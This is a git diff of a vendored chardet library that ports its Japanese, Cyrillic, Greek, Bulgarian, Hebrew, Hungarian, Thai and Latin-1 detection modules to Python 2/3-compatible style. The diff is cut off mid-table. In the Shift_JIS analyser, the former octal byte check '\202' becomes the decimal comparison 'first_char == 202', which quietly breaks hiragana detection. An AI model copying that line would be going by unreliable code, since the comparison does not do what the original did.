JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0 -# Char to FreqOrder table , +# Char to FreqOrder table , JIS_TABLE_SIZE = 4368 -JISCharToFreqOrder = ( \ +JISCharToFreqOrder = ( 40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16 3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32 1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48 @@ -565,3 +565,5 @@ JISCharToFreqOrder = ( \ 8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240 8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256 8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272 + +# flake8: noqa diff --git a/thirdparty/chardet/jpcntx.py b/thirdparty/chardet/jpcntx.py index 06d396e5b..59aeb6a87 100644 --- a/thirdparty/chardet/jpcntx.py +++ b/thirdparty/chardet/jpcntx.py @@ -13,19 +13,19 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants +from .compat import wrap_ord NUM_OF_CATEGORY = 6 DONT_KNOW = -1 @@ -34,7 +34,7 @@ MAX_REL_THRESHOLD = 1000 MINIMUM_DATA_THRESHOLD = 4 # This is hiragana 2-char sequence table, the number in each cell represents its frequency category -jp2CharContext = ( \ +jp2CharContext = ( (0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1), (2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4), (0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2), @@ -125,24 +125,31 @@ class JapaneseContextAnalysis: self.reset() def reset(self): - self._mTotalRel = 0 # total sequence received - self._mRelSample = [0] * NUM_OF_CATEGORY # category counters, each interger counts sequence in its category - self._mNeedToSkipCharNum = 0 # if last byte in current buffer is not the last byte of a character, we need to know how many bytes to skip in next buffer - self._mLastCharOrder = -1 # The order of previous char - self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made + self._mTotalRel = 0 # total sequence received + # category counters, each interger counts sequence in its category + self._mRelSample = [0] * NUM_OF_CATEGORY + # if last byte in current buffer is not the last byte of a character, + # we need to know how many bytes to skip in next buffer + self._mNeedToSkipCharNum = 0 + self._mLastCharOrder = -1 # The order of previous char + # If this flag is set to True, detection is done and conclusion has + # been made + self._mDone = False def feed(self, aBuf, aLen): - if self._mDone: return + if self._mDone: + return # The buffer we got is byte oriented, and a character may span in more than one - # buffers. In case the last one or two byte in last buffer is not complete, we - # record how many byte needed to complete that character and skip these bytes here. - # We can choose to record those bytes as well and analyse the character once it - # is complete, but since a character will not make much difference, by simply skipping + # buffers. In case the last one or two byte in last buffer is not + # complete, we record how many byte needed to complete that character + # and skip these bytes here. We can choose to record those bytes as + # well and analyse the character once it is complete, but since a + # character will not make much difference, by simply skipping # this character will simply our logic and improve performance. i = self._mNeedToSkipCharNum while i < aLen: - order, charLen = self.get_order(aBuf[i:i+2]) + order, charLen = self.get_order(aBuf[i:i + 2]) i += charLen if i > aLen: self._mNeedToSkipCharNum = i - aLen @@ -151,7 +158,7 @@ class JapaneseContextAnalysis: if (order != -1) and (self._mLastCharOrder != -1): self._mTotalRel += 1 if self._mTotalRel > MAX_REL_THRESHOLD: - self._mDone = constants.True + self._mDone = True break self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1 self._mLastCharOrder = order @@ -166,45 +173,55 @@ class JapaneseContextAnalysis: else: return DONT_KNOW - def get_order(self, aStr): + def get_order(self, aBuf): return -1, 1 class SJISContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aStr): - if not aStr: return -1, 1 + def __init__(self): + self.charset_name = "SHIFT_JIS" + + def get_charset_name(self): + return self.charset_name + + def get_order(self, aBuf): + if not aBuf: + return -1, 1 # find out current char's byte length - if ((aStr[0] >= '\x81') and (aStr[0] <= '\x9F')) or \ - ((aStr[0] >= '\xE0') and (aStr[0] <= '\xFC')): + first_char = wrap_ord(aBuf[0]) + if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)): charLen = 2 + if (first_char == 0x87) or (0xFA <= first_char <= 0xFC): + self.charset_name = "CP932" else: charLen = 1 # return its order if it is hiragana - if len(aStr) > 1: - if (aStr[0] == '\202') and \ - (aStr[1] >= '\x9F') and \ - (aStr[1] <= '\xF1'): - return ord(aStr[1]) - 0x9F, charLen + if len(aBuf) > 1: + second_char = wrap_ord(aBuf[1]) + if (first_char == 202) and (0x9F <= second_char <= 0xF1): + return second_char - 0x9F, charLen return -1, charLen class EUCJPContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aStr): - if not aStr: return -1, 1 + def get_order(self, aBuf): + if not aBuf: + return -1, 1 # find out current char's byte length - if (aStr[0] == '\x8E') or \ - ((aStr[0] >= '\xA1') and (aStr[0] <= '\xFE')): + first_char = wrap_ord(aBuf[0]) + if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE): charLen = 2 - elif aStr[0] == '\x8F': + elif first_char == 0x8F: charLen = 3 else: charLen = 1 # return its order if it is hiragana - if len(aStr) > 1: - if (aStr[0] == '\xA4') and \ - (aStr[1] >= '\xA1') and \ - (aStr[1] <= '\xF3'): - return ord(aStr[1]) - 0xA1, charLen + if len(aBuf) > 1: + second_char = wrap_ord(aBuf[1]) + if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3): + return second_char - 0xA1, charLen return -1, charLen + +# flake8: noqa diff --git a/thirdparty/chardet/langbulgarianmodel.py b/thirdparty/chardet/langbulgarianmodel.py index bf5641e7b..e5788fc64 100644 --- a/thirdparty/chardet/langbulgarianmodel.py +++ b/thirdparty/chardet/langbulgarianmodel.py @@ -13,30 +13,28 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # Character Mapping Table: -# this table is modified base on win1251BulgarianCharToOrderMap, so +# this table is modified base on win1251BulgarianCharToOrderMap, so # only number <64 is sure valid -Latin5_BulgarianCharToOrderMap = ( \ +Latin5_BulgarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -55,7 +53,7 @@ Latin5_BulgarianCharToOrderMap = ( \ 62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0 ) -win1251BulgarianCharToOrderMap = ( \ +win1251BulgarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -74,13 +72,13 @@ win1251BulgarianCharToOrderMap = ( \ 7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0 ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 96.9392% # first 1024 sequences:3.0618% # rest sequences: 0.2992% -# negative sequences: 0.0020% -BulgarianLangModel = ( \ +# negative sequences: 0.0020% +BulgarianLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3, 3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2, 3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1, @@ -211,18 +209,21 @@ BulgarianLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, ) -Latin5BulgarianModel = { \ +Latin5BulgarianModel = { 'charToOrderMap': Latin5_BulgarianCharToOrderMap, 'precedenceMatrix': BulgarianLangModel, 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "ISO-8859-5" } -Win1251BulgarianModel = { \ +Win1251BulgarianModel = { 'charToOrderMap': win1251BulgarianCharToOrderMap, 'precedenceMatrix': BulgarianLangModel, 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1251" } + + +# flake8: noqa diff --git a/thirdparty/chardet/langcyrillicmodel.py b/thirdparty/chardet/langcyrillicmodel.py index e604cc73d..a86f54bd5 100644 --- a/thirdparty/chardet/langcyrillicmodel.py +++ b/thirdparty/chardet/langcyrillicmodel.py @@ -13,23 +13,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # KOI8-R language model # Character Mapping Table: -KOI8R_CharToOrderMap = ( \ +KOI8R_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -48,7 +46,7 @@ KOI8R_CharToOrderMap = ( \ 35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0 ) -win1251_CharToOrderMap = ( \ +win1251_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -67,7 +65,7 @@ win1251_CharToOrderMap = ( \ 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, ) -latin5_CharToOrderMap = ( \ +latin5_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -86,7 +84,7 @@ latin5_CharToOrderMap = ( \ 239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, ) -macCyrillic_CharToOrderMap = ( \ +macCyrillic_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -105,7 +103,7 @@ macCyrillic_CharToOrderMap = ( \ 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255, ) -IBM855_CharToOrderMap = ( \ +IBM855_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -124,7 +122,7 @@ IBM855_CharToOrderMap = ( \ 250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255, ) -IBM866_CharToOrderMap = ( \ +IBM866_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -143,13 +141,13 @@ IBM866_CharToOrderMap = ( \ 239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 97.6601% # first 1024 sequences: 2.3389% # rest sequences: 0.1237% -# negative sequences: 0.0009% -RussianLangModel = ( \ +# negative sequences: 0.0009% +RussianLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3, 3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2, 3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0, @@ -280,50 +278,52 @@ RussianLangModel = ( \ 0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, ) -Koi8rModel = { \ +Koi8rModel = { 'charToOrderMap': KOI8R_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "KOI8-R" } -Win1251CyrillicModel = { \ +Win1251CyrillicModel = { 'charToOrderMap': win1251_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1251" } -Latin5CyrillicModel = { \ +Latin5CyrillicModel = { 'charToOrderMap': latin5_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "ISO-8859-5" } -MacCyrillicModel = { \ +MacCyrillicModel = { 'charToOrderMap': macCyrillic_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "MacCyrillic" }; -Ibm866Model = { \ +Ibm866Model = { 'charToOrderMap': IBM866_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "IBM866" } -Ibm855Model = { \ +Ibm855Model = { 'charToOrderMap': IBM855_CharToOrderMap, 'precedenceMatrix': RussianLangModel, 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "IBM855" } + +# flake8: noqa diff --git a/thirdparty/chardet/langgreekmodel.py b/thirdparty/chardet/langgreekmodel.py index ec6d49e80..ddb583765 100644 --- a/thirdparty/chardet/langgreekmodel.py +++ b/thirdparty/chardet/langgreekmodel.py @@ -13,27 +13,25 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # Character Mapping Table: -Latin7_CharToOrderMap = ( \ +Latin7_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -52,7 +50,7 @@ Latin7_CharToOrderMap = ( \ 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 ) -win1253_CharToOrderMap = ( \ +win1253_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -71,13 +69,13 @@ win1253_CharToOrderMap = ( \ 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 98.2851% # first 1024 sequences:1.7001% # rest sequences: 0.0359% -# negative sequences: 0.0148% -GreekLangModel = ( \ +# negative sequences: 0.0148% +GreekLangModel = ( 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0, @@ -208,18 +206,20 @@ GreekLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, ) -Latin7GreekModel = { \ +Latin7GreekModel = { 'charToOrderMap': Latin7_CharToOrderMap, 'precedenceMatrix': GreekLangModel, 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "ISO-8859-7" } -Win1253GreekModel = { \ +Win1253GreekModel = { 'charToOrderMap': win1253_CharToOrderMap, 'precedenceMatrix': GreekLangModel, 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1253" } + +# flake8: noqa diff --git a/thirdparty/chardet/langhebrewmodel.py b/thirdparty/chardet/langhebrewmodel.py index a8bcc65bf..75f2bc7fe 100644 --- a/thirdparty/chardet/langhebrewmodel.py +++ b/thirdparty/chardet/langhebrewmodel.py @@ -15,20 +15,18 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word @@ -36,7 +34,7 @@ import constants # Windows-1255 language model # Character Mapping Table: -win1255_CharToOrderMap = ( \ +win1255_CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -55,13 +53,13 @@ win1255_CharToOrderMap = ( \ 12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 98.4004% # first 1024 sequences: 1.5981% # rest sequences: 0.087% -# negative sequences: 0.0015% -HebrewLangModel = ( \ +# negative sequences: 0.0015% +HebrewLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0, 3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1, 3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2, @@ -192,10 +190,12 @@ HebrewLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0, ) -Win1255HebrewModel = { \ +Win1255HebrewModel = { 'charToOrderMap': win1255_CharToOrderMap, 'precedenceMatrix': HebrewLangModel, 'mTypicalPositiveRatio': 0.984004, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "windows-1255" } + +# flake8: noqa diff --git a/thirdparty/chardet/langhungarianmodel.py b/thirdparty/chardet/langhungarianmodel.py index d635f03c2..49d2f0fe7 100644 --- a/thirdparty/chardet/langhungarianmodel.py +++ b/thirdparty/chardet/langhungarianmodel.py @@ -13,27 +13,25 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 # Character Mapping Table: -Latin2_HungarianCharToOrderMap = ( \ +Latin2_HungarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -52,7 +50,7 @@ Latin2_HungarianCharToOrderMap = ( \ 245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253, ) -win1250HungarianCharToOrderMap = ( \ +win1250HungarianCharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -71,13 +69,13 @@ win1250HungarianCharToOrderMap = ( \ 245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 94.7368% # first 1024 sequences:5.2623% # rest sequences: 0.8894% -# negative sequences: 0.0009% -HungarianLangModel = ( \ +# negative sequences: 0.0009% +HungarianLangModel = ( 0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3, 3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2, 3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1, @@ -208,18 +206,20 @@ HungarianLangModel = ( \ 0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0, ) -Latin2HungarianModel = { \ +Latin2HungarianModel = { 'charToOrderMap': Latin2_HungarianCharToOrderMap, 'precedenceMatrix': HungarianLangModel, 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': constants.True, + 'keepEnglishLetter': True, 'charsetName': "ISO-8859-2" } -Win1250HungarianModel = { \ +Win1250HungarianModel = { 'charToOrderMap': win1250HungarianCharToOrderMap, 'precedenceMatrix': HungarianLangModel, 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': constants.True, + 'keepEnglishLetter': True, 'charsetName': "windows-1250" } + +# flake8: noqa diff --git a/thirdparty/chardet/langthaimodel.py b/thirdparty/chardet/langthaimodel.py index 96ec054f2..0508b1b1a 100644 --- a/thirdparty/chardet/langthaimodel.py +++ b/thirdparty/chardet/langthaimodel.py @@ -13,29 +13,27 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants - # 255: Control characters that usually does not exist in any text # 254: Carriage/Return # 253: symbol (punctuation) that does not belong to word # 252: 0 - 9 -# The following result for thai was collected from a limited sample (1M). +# The following result for thai was collected from a limited sample (1M). # Character Mapping Table: -TIS620CharToOrderMap = ( \ +TIS620CharToOrderMap = ( 255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 @@ -54,13 +52,13 @@ TIS620CharToOrderMap = ( \ 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253, ) -# Model Table: +# Model Table: # total sequences: 100% # first 512 sequences: 92.6386% # first 1024 sequences:7.3177% # rest sequences: 1.0230% -# negative sequences: 0.0436% -ThaiLangModel = ( \ +# negative sequences: 0.0436% +ThaiLangModel = ( 0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3, 0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2, 3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3, @@ -191,10 +189,12 @@ ThaiLangModel = ( \ 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, ) -TIS620ThaiModel = { \ +TIS620ThaiModel = { 'charToOrderMap': TIS620CharToOrderMap, 'precedenceMatrix': ThaiLangModel, 'mTypicalPositiveRatio': 0.926386, - 'keepEnglishLetter': constants.False, + 'keepEnglishLetter': False, 'charsetName': "TIS-620" } + +# flake8: noqa diff --git a/thirdparty/chardet/latin1prober.py b/thirdparty/chardet/latin1prober.py index ae4527c75..eef357354 100644 --- a/thirdparty/chardet/latin1prober.py +++ b/thirdparty/chardet/latin1prober.py @@ -14,85 +14,86 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from charsetprober import CharSetProber -import constants -import operator +from .charsetprober import CharSetProber +from .constants import eNotMe +from .compat import wrap_ord FREQ_CAT_NUM = 4 -UDF = 0 # undefined -OTH = 1 # other -ASC = 2 # ascii capital letter -ASS = 3 # ascii small letter -ACV = 4 # accent capital vowel -ACO = 5 # accent capital other -ASV = 6 # accent small vowel -ASO = 7 # accent small other -CLASS_NUM = 8 # total classes +UDF = 0 # undefined +OTH = 1 # other +ASC = 2 # ascii capital letter +ASS = 3 # ascii small letter +ACV = 4 # accent capital vowel +ACO = 5 # accent capital other +ASV = 6 # accent small vowel +ASO = 7 # accent small other +CLASS_NUM = 8 # total classes -Latin1_CharToClass = ( \ - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 